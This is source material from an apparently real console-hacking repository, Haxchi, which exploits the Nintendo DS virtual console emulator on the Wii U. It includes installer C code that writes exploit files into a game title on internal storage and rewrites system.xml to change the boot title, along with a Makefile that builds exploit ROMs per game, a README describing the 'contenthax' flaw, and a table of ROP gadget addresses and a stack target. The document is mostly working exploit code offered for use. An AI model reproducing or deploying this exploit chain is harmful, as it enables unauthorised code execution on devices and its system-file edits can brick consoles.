IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
sprintf(path,"%s/meta/meta.xml",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) >= 0)
{
IOSUHAX_FSA_StatFile(fsaFd, mlcFd, &stats);
size_t metaSize = stats.size;
char *metaBuf = MEMBucket_alloc(metaSize,4);
fsa_read(fsaFd, mlcFd, metaBuf, metaSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
//parse doc
xmlDocPtr doc = xmlReadMemory(metaBuf, metaSize, "meta.xml", "utf-8", 0);
//change title
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "longname_", 9) == 0 || memcmp(cur_node->name, "shortname_", 10) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
xmlNodeSetContent(cur_node, titleBuf);
}
}
}
//back to xml
xmlChar *newXml = NULL;
int newSize = 0;
xmlSaveNoEmptyTags = 1; //keeps original style
xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
xmlFreeDoc(doc);
if(newXml != NULL && newSize > 0)
{
//libxml2 adds in extra \n at the end
if(newXml[newSize-1] == '\n' && metaBuf[metaSize-1] != '\n')
{
newXml[newSize-1] = '\0';
newSize--;
}
//write back to nand
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Changing game title...");
//UTF-8 BOM
char bom[3] = { 0xEF, 0xBB, 0xBF };
if(memcmp(newXml, bom, 3) != 0 && memcmp(metaBuf, bom, 3) == 0)
fsa_write(fsaFd, mlcFd, bom, 0x03);
fsa_write(fsaFd, mlcFd, newXml, newSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
free(newXml);
}
MEMBucket_free(metaBuf);
}
MEMBucket_free(titleBuf);
}
sprintf(sdPath,"%s/bootDrcTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootDrcTexSize = stats.size;
uint8_t *bootDrcTex = MEMBucket_alloc(bootDrcTexSize,4);
fsa_read(fsaFd, sdFd, bootDrcTex, bootDrcTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootDrcTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootDrcTex.tga...");
fsa_write(fsaFd, mlcFd, bootDrcTex, bootDrcTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootDrcTex);
}
sprintf(sdPath,"%s/bootTvTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootTvTexSize = stats.size;
uint8_t *bootTvTex = MEMBucket_alloc(bootTvTexSize,4);
fsa_read(fsaFd, sdFd, bootTvTex, bootTvTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootTvTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootTvTex.tga...");
fsa_write(fsaFd, mlcFd, bootTvTex, bootTvTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootTvTex);
}
sprintf(sdPath,"%s/iconTex.tga",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t iconTexSize = stats.size;
uint8_t *iconTex = MEMBucket_alloc(iconTexSize,4);
fsa_read(fsaFd, sdFd, iconTex, iconTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/iconTex.tga",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing iconTex.tga...");
fsa_write(fsaFd, mlcFd, iconTex, iconTexSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(iconTex);
}
sprintf(sdPath,"%s/bootSound.btsnd",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t bootSoundSize = stats.size;
uint8_t *bootSound = MEMBucket_alloc(bootSoundSize,4);
fsa_read(fsaFd, sdFd, bootSound, bootSoundSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/meta/bootSound.btsnd",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing bootSound.btsnd...");
fsa_write(fsaFd, mlcFd, bootSound, bootSoundSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
MEMBucket_free(bootSound);
}
#ifdef CB
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
//change default title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
int xmlBackedUp = 0;
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) < 0)
{
//write syshax.xml
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "wb", &slcFd) >= 0)
{
println(line++,"Writing syshax.xml...");
fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
xmlBackedUp = 1;
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
}
else
{
println(line++,"syshax.xml already found, skipping...");
xmlBackedUp = 1;
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
if(xmlBackedUp == 0)
println(line++,"Failed to back up system.xml!");
else
{
idFound = 0, idCorrect = 0;
root_element = xmlDocGetRootElement(doc);
cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0)
{
xmlNodeSetContent(cur_node, (xmlChar*)new_title_id);
idCorrect++;
}
idFound++;
}
}
}
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
//back to xml
xmlChar *newXml = NULL;
int newSize = 0;
xmlSaveNoEmptyTags = 0; //yep, different from meta.xml style
xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
xmlFreeDoc(doc);
if(newXml != NULL && newSize > 0)
{
//libxml2 adds in extra \n at the end
if(newXml[newSize-1] == '\n' && sysXmlBuf[sysXmlSize-1] != '\n')
{
newXml[newSize-1] = '\0';
newSize--;
}
//write back to nand
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath2, "wb", &slcFd) >= 0)
{
println(line++,"Writing system.xml...");
//UTF-8 BOM
char bom[3] = { 0xEF, 0xBB, 0xBF };
if(memcmp(newXml, bom, 3) != 0 && memcmp(sysXmlBuf, bom, 3) == 0)
fsa_write(fsaFd, slcFd, bom, 0x03);
fsa_write(fsaFd, slcFd, newXml, newSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
}
free(newXml);
}
}
}
}
MEMBucket_free(sysXmlBuf);
}
println(line++,"Done installing CBHC!");
#else
println(line++,"Done installing Haxchi!");
#endif
WHBLogPrintf("Success");
WHBLogConsoleDraw();
prgEnd:
if(tList) //cant be in MEMBucket
free(tList);
//close trigger everything fsa related
if(fsaFd >= 0)
{
if(slcFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
if(mlcFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
if(sdFd >= 0)
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
if(sdMounted)
IOSUHAX_FSA_Unmount(fsaFd, sdCardVolPath, 2);
if(IOSUHAX_FSA_FlushVolume(fsaFd, "/vol/storage_mlc01") == 0)
println(line++, "Flushed NAND Cache!");
IOSUHAX_FSA_Close(fsaFd);
}
IOSUHAX_Close();
sleep(5);
OSForceFullRelaunch();
ProcUIShutdown();
memoryRelease();
WHBLogConsoleFree();
SYSRelaunchTitle(0, NULL);
WHBProcShutdown();
return 0;
}

19
haxchi_installer/src/main.h Normal file
View File

@ -0,0 +1,19 @@
//Main.h
#ifndef _MAIN_H_
#define _MAIN_H_
#include <stdint.h>
/* Main */
#ifdef __cplusplus
extern "C" {
#endif
//! C wrapper for our C++ functions
int Menu_Main(void);
#ifdef __cplusplus
}
#endif
#endif

185
haxchi_installer/src/memory.c Normal file
View File

@ -0,0 +1,185 @@
/****************************************************************************
* Copyright (C) 2015 Dimok
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
****************************************************************************/
#include <malloc.h>
#include <string.h>
#include <coreinit/memheap.h>
#include <coreinit/memfrmheap.h>
#include <coreinit/memexpheap.h>
#include "memory.h"
#define MEMORY_ARENA_1 0
#define MEMORY_ARENA_2 1
#define MEMORY_ARENA_3 2
#define MEMORY_ARENA_4 3
#define MEMORY_ARENA_5 4
#define MEMORY_ARENA_6 5
#define MEMORY_ARENA_7 6
#define MEMORY_ARENA_8 7
#define MEMORY_ARENA_FG_BUCKET 8
//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//! Memory functions
//! This is the only place where those are needed so lets keep them more or less private
//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
static MEMHeapHandle mem1_heap = NULL;
static MEMHeapHandle bucket_heap = NULL;
void memoryInitialize(void) {
if(!mem1_heap) {
MEMHeapHandle mem1_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_1);
unsigned int mem1_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(mem1_heap_handle, 4);
void *mem1_memory = MEMAllocFromFrmHeapEx(mem1_heap_handle, mem1_allocatable_size, 4);
if(mem1_memory)
mem1_heap = MEMCreateExpHeapEx(mem1_memory, mem1_allocatable_size, 0);
}
if(!bucket_heap) {
MEMHeapHandle bucket_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET);
unsigned int bucket_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(bucket_heap_handle, 4);
void *bucket_memory = MEMAllocFromFrmHeapEx(bucket_heap_handle, bucket_allocatable_size, 4);
if(bucket_memory)
bucket_heap = MEMCreateExpHeapEx(bucket_memory, bucket_allocatable_size, 0);
}
}
void memoryRelease(void) {
if(mem1_heap) {
MEMDestroyExpHeap(mem1_heap);
MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_1), 3);
mem1_heap = NULL;
}
if(bucket_heap) {
MEMDestroyExpHeap(bucket_heap);
MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET), 3);
bucket_heap = NULL;
}
}
/*
//!-------------------------------------------------------------------------------------------
//! wraps
//!-------------------------------------------------------------------------------------------
void *__wrap_malloc(size_t size)
{
// pointer to a function resolve
return ((void * (*)(size_t))(*pMEMAllocFromDefaultHeap))(size);
}
void *__wrap_memalign(size_t align, size_t size)
{
if (align < 4)
align = 4;
// pointer to a function resolve
return ((void * (*)(size_t, size_t))(*pMEMAllocFromDefaultHeapEx))(size, align);
}
void __wrap_free(void *p)
{
// pointer to a function resolve
if(p != 0)
((void (*)(void *))(*pMEMFreeToDefaultHeap))(p);
}
void *__wrap_calloc(size_t n, size_t size)
{
void *p = __wrap_malloc(n * size);
if (p != 0) {
memset(p, 0, n * size);
}
return p;
}
size_t __wrap_malloc_usable_size(void *p)
{
//! TODO: this is totally wrong and needs to be addressed
return 0x7FFFFFFF;
}
void *__wrap_realloc(void *p, size_t size)
{
void *new_ptr = __wrap_malloc(size);
if (new_ptr != 0)
{
memcpy(new_ptr, p, __wrap_malloc_usable_size(p) < size ? __wrap_malloc_usable_size(p) : size);
__wrap_free(p);
}
return new_ptr;
}
//!-------------------------------------------------------------------------------------------
//! reent versions
//!-------------------------------------------------------------------------------------------
void *__wrap__malloc_r(struct _reent *r, size_t size)
{
return __wrap_malloc(size);
}
void *__wrap__calloc_r(struct _reent *r, size_t n, size_t size)
{
return __wrap_calloc(n, size);
}
void *__wrap__memalign_r(struct _reent *r, size_t align, size_t size)
{
return __wrap_memalign(align, size);
}
void __wrap__free_r(struct _reent *r, void *p)
{
__wrap_free(p);
}
size_t __wrap__malloc_usable_size_r(struct _reent *r, void *p)
{
return __wrap_malloc_usable_size(p);
}
void *__wrap__realloc_r(struct _reent *r, void *p, size_t size)
{
return __wrap_realloc(p, size);
}
*/
//!-------------------------------------------------------------------------------------------
//! some wrappers
//!-------------------------------------------------------------------------------------------
void * MEM2_alloc(unsigned int size, unsigned int align) {
return memalign(align, size);
}
void MEM2_free(void *ptr) {
free(ptr);
}
void * MEM1_alloc(unsigned int size, unsigned int align) {
if (align < 4)
align = 4;
return MEMAllocFromExpHeapEx(mem1_heap, size, align);
}
void MEM1_free(void *ptr) {
MEMFreeToExpHeap(mem1_heap, ptr);
}
void * MEMBucket_alloc(unsigned int size, unsigned int align) {
if (align < 4)
align = 4;
return MEMAllocFromExpHeapEx(bucket_heap, size, align);
}
void MEMBucket_free(void *ptr) {
MEMFreeToExpHeap(bucket_heap, ptr);
}

42
haxchi_installer/src/memory.h Normal file
View File

@ -0,0 +1,42 @@
/****************************************************************************
* Copyright (C) 2015 Dimok
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
****************************************************************************/
#ifndef __MEMORY_H_
#define __MEMORY_H_
#ifdef __cplusplus
extern "C" {
#endif
#include <malloc.h>
void memoryInitialize(void);
void memoryRelease(void);
void * MEM2_alloc(unsigned int size, unsigned int align);
void MEM2_free(void *ptr);
void * MEM1_alloc(unsigned int size, unsigned int align);
void MEM1_free(void *ptr);
void * MEMBucket_alloc(unsigned int size, unsigned int align);
void MEMBucket_free(void *ptr);
#ifdef __cplusplus
}
#endif
#endif // __MEMORY_H_

5
payload_generator/.gitignore vendored Normal file
View File

@ -0,0 +1,5 @@
*.nds
*.zip
*.bin
defines.s
haxchi_installer/src/zipList.h

268
payload_generator/Makefile Normal file
View File

@ -0,0 +1,268 @@
.PHONY := all code550.bin
ifeq ($(Windows_NT), 1)
ZIP = zip/zip.exe
else
ZIP = zip
endif
HAXCHI_S = haxchi.s
ROP_S = haxchi_rop.s
COREINIT_S = coreinit.s
ROP_BIN = haxchi_rop.bin
RELEASE = ../haxchi_installer
TARGET_PATH = $(RELEASE)/data
BUILD = build
DEFINES = defines
all: setup animalcrossing brainage dkjclimber guardiansigns kirby kirbymassattack mariokartds masterofdisguise newsmb_eur partnersintime \
pokemonranger sfcommand sm64ds yoshids zeldaph zeldast \
animalcrossing.zip brainage.zip dkjclimber.zip guardiansigns.zip kirby.zip kirbymassattack.zip mariokartds.zip masterofdisguise.zip \
newsmb_eur.zip partnersintime.zip pokemonranger.zip sfcommand.zip sm64ds.zip yoshids.zip zeldaph.zip zeldast.zip
animalcrossing: setup_animalcrossing animalcrossing.nds
brainage: setup_brainage brainage.nds
dkjclimber: setup_dkjclimber dkjclimber.nds
guardiansigns: setup_guardiansigns guardiansigns.nds
kirby: setup_kirby kirby.nds
kirbymassattack: setup_kirbymassattack kirbymassattack.nds
mariokartds: setup_mariokartds mariokartds.nds
masterofdisguise: setup_masterofdisguise masterofdisguise.nds
newsmb_eur: setup_newsmb_eur newsmb_eur.nds
partnersintime: setup_partnersintime partnersintime.nds
pokemonranger: setup_pokemonranger pokemonranger.nds
sfcommand: setup_sfcommand sfcommand.nds
sm64ds: setup_sm64ds sm64ds.nds
yoshids: setup_yoshids yoshids.nds
zeldaph: setup_zeldaph zeldaph.nds
zeldast: setup_zeldast zeldast.nds
setup:
mkdir -p $(TARGET_PATH)
mkdir -p $(BUILD)
setup_animalcrossing:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/animalcrossing_defs.s defines.s
setup_brainage:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/brainage_defs.s defines.s
setup_dkjclimber:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/dkjclimber_defs.s defines.s
setup_guardiansigns:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/guardiansigns_defs.s defines.s
setup_kirby:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/kirby_defs.s defines.s
setup_kirbymassattack:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/kirbymassattack_defs.s defines.s
setup_mariokartds:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/mariokartds_defs.s defines.s
setup_masterofdisguise:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/masterofdisguise_defs.s defines.s
setup_newsmb_eur:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/newsmb_eur_defs.s defines.s
setup_pokemonranger:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/pokemonranger_defs.s defines.s
setup_partnersintime:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/partnersintime_defs.s defines.s
setup_sfcommand:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/sfcommand_defs.s defines.s
setup_sm64ds:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/sm64ds_defs.s defines.s
setup_yoshids:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/yoshids_defs.s defines.s
setup_zeldaph:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/zeldaph_defs.s defines.s
setup_zeldast:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f $(DEFINES)/zeldast_defs.s defines.s
animalcrossing.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/animalcrossing.nds
brainage.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/brainage.nds
@cp $(BUILD)/brainage.nds $(BUILD)/yoshitouchandgo.nds
dkjclimber.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/dkjclimber.nds
guardiansigns.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/guardiansigns.nds
kirby.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/kirby.nds
kirbymassattack.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/kirbymassattack.nds
mariokartds.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/mariokartds.nds
@cp $(BUILD)/mariokartds.nds $(BUILD)/newsmb.nds
masterofdisguise.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/masterofdisguise.nds
newsmb_eur.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/newsmb_eur.nds
pokemonranger.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/pokemonranger.nds
partnersintime.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/partnersintime.nds
sfcommand.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/sfcommand.nds
sm64ds.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/sm64ds.nds
@cp $(BUILD)/sm64ds.nds $(BUILD)/kirbycanvascurse.nds
yoshids.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/yoshids.nds
@cp $(BUILD)/yoshids.nds $(BUILD)/wwtouched.nds
@cp $(BUILD)/yoshids.nds $(BUILD)/bigbrainacademy.nds
zeldaph.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/zeldaph.nds
zeldast.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds $(BUILD)/zeldast.nds
@cp $(BUILD)/zeldast.nds $(BUILD)/explorersofsky.nds
@cp $(BUILD)/zeldast.nds $(BUILD)/shadowsofalmia.nds
animalcrossing.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/animalcrossing.zip $(BUILD)/animalcrossing.nds
brainage.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/brainage.zip $(BUILD)/brainage.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/yoshitouchandgo.zip $(BUILD)/yoshitouchandgo.nds
dkjclimber.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/dkjclimber.zip $(BUILD)/dkjclimber.nds
guardiansigns.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/guardiansigns.zip $(BUILD)/guardiansigns.nds
kirby.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/kirby.zip $(BUILD)/kirby.nds
kirbymassattack.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/kirbymassattack.zip $(BUILD)/kirbymassattack.nds
mariokartds.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/mariokartds.zip $(BUILD)/mariokartds.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb.zip $(BUILD)/newsmb.nds
masterofdisguise.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/masterofdisguise.zip $(BUILD)/masterofdisguise.nds
newsmb_eur.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/newsmb_eur.zip $(BUILD)/newsmb_eur.nds
pokemonranger.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/pokemonranger.zip $(BUILD)/pokemonranger.nds
partnersintime.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/partnersintime.zip $(BUILD)/partnersintime.nds
sfcommand.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/sfcommand.zip $(BUILD)/sfcommand.nds
sm64ds.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/sm64ds.zip $(BUILD)/sm64ds.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/kirbycanvascurse.zip $(BUILD)/kirbycanvascurse.nds
yoshids.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/yoshids.zip $(BUILD)/yoshids.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/wwtouched.zip $(BUILD)/wwtouched.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/bigbrainacademy.zip $(BUILD)/bigbrainacademy.nds
zeldaph.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/zeldaph.zip $(BUILD)/zeldaph.nds
zeldast.zip:
$(ZIP) -JXjq9 $(TARGET_PATH)/zeldast.zip $(BUILD)/zeldast.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/explorersofsky.zip $(BUILD)/explorersofsky.nds
$(ZIP) -JXjq9 $(TARGET_PATH)/shadowsofalmia.zip $(BUILD)/shadowsofalmia.nds
clean:
@rm -fr *.nds $(TARGET_PATH)/*.zip $(DATA) $(BUILD) defines.s
@echo "all cleaned up !"

27
payload_generator/README.md Normal file
View File

@ -0,0 +1,27 @@
# Haxchi-Exploit
This is the continuation of Haxchi from FIX94 (initial PoC by smea).
```
haxchi is an exploit for the Nintendo DS virtual console emulator on Wii U (hachihachi).
it is possible due to "contenthax", a vulnerability in the wii u's title integrity design:
only code and critical descriptors are signed, with all other contents left at the mercy of attackers.
```
# Usage
Put a payload `code550.bin` in the root of this project.
This payload should be statically linked to 0x18000000, and is called inside a thread.
Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.
An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
# Notes
Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
## Dependencies
[armips](https://github.com/Kingcom/armips/releases) and zip in your PATH variable.
## credit
smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.

0
coreinit.s → payload_generator/coreinit.s
View File

39
payload_generator/defines/animalcrossing_defs.s Normal file
View File

@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B6A4-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16440F00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9DC4)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A999C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F924)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F310)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018AB0)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5204)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F624)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020862CC)
